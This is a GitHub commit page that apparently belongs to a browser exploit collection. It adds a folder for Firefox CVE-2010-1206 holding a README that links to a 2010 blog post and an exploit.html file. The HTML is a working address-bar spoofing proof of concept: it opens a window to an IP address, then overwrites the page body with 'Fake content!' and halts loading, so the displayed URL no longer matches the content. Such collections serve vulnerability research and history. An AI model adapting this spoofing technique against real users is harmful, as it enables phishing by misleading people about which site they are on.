Skip to content

Commit 7d60103

Browse files
committed
feat(ff): add CVE-2010-1206
1 parent 8714e77 commit 7d60103

File tree

2 files changed

+12
-0
lines changed

2 files changed

+12
-0
lines changed

firefox/CVE-2010-1206/README.md

+3
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,3 @@
1+
# Yeah-about-that-address-bar-thing
2+
3+
Link: https://lcamtuf.blogspot.com/2010/06/yeah-about-that-address-bar-thing.html

firefox/CVE-2010-1206/exploit.html

+9
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
<input type=submit value="Click me!" onclick="clicked()">
2+
<script>
3+
var w;
4+
5+
function clicked() {
6+
w = window.open("http://1.2.3.4/", "_blank", "toolbar=1,menubar=1");
7+
setTimeout('w.document.body.innerHTML = "Fake content!";w.stop();', 500);
8+
}
9+
</script>

0 commit comments

Comments
 (0)